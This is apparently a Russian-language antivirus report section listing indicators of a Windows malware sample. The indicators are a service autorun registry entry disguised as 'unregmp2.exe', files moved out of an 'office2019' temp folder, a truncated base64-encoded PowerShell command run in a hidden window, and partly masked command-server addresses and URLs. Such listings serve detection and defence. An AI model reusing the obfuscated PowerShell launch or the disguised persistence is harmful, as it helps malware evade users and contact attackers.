Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\unregmp2] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\unregmp2] 'ImagePath' = '"%WINDIR%\SysWOW64\olecli32\unregmp2.exe"'
- 'unregmp2' "%WINDIR%\SysWOW64\olecli32\unregmp2.exe"
- 'unregmp2' %WINDIR%\SysWOW64\olecli32\unregmp2.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAHUAMQAwAHQANABxAD0AKAAnAFAAcwAnACsAJwAxAGUAdwBtACcAKwAnAGEAJwApADsALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\qioopg5m.exe
- %WINDIR%\syswow64\olecli32\unregmp2.exe
- %TEMP%\office2019\qioopg5m.exe в %WINDIR%\syswow64\olecli32\unregmp2.exe
- '65.#6.62.20':80
- '20#.#26.6.222':8080
- http://zm###dia.com/cgi-bin/wd/
- http://20#.##6.6.222:8080/ypbo8wY/sZ1M1e4AQeit/fUtEXd4xKjr0jCrrkow/8q57vOPwyoqj/IF8PZphB0FDLTAygC/hCInrZnzIm7qBuD6J/ via 20#.#26.6.222
- DNS ASK zm###dia.com
- '%TEMP%\office2019\qioopg5m.exe'
- '%WINDIR%\syswow64\olecli32\unregmp2.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAHUAMQAwAHQANABxAD0AKAAnAFAAcwAnACsAJwAxAGUAdwBtACcAKwAnAGEAJwApADsALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)